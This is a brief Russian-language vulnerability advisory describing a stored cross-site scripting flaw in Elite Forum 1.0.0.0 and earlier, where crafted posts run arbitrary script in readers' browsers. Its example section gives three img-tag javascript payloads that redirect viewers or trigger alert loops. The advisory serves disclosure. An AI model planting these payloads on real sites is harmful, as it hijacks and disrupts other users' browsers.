Программа: Elite Forum 1.0.0.0 и более ранние версии
Уязвимость позволяет удаленному
пользователю произвести XSS нападение и
получить доступ к потенциально важным
данным других пользователей. Уязвимость
обнаружена при обработке входных данных.
Удаленный пользователь может создать
специально сформированное сообщение и
выполнить произвольный HTML код в браузере
жертвы в контексте безопасности уязвимого
сайта.
Пример:
< img src="javascript:void(window.location=('imagelink'))"> -
Replace the imagelink with the link to the image you want to redirect the users
viewing the topic containing this code.
<img src="javascript:a=100;while(a>=0){alert(a);a--}">
<img src="javascript:a=1;while(a>0){alert("sup?")">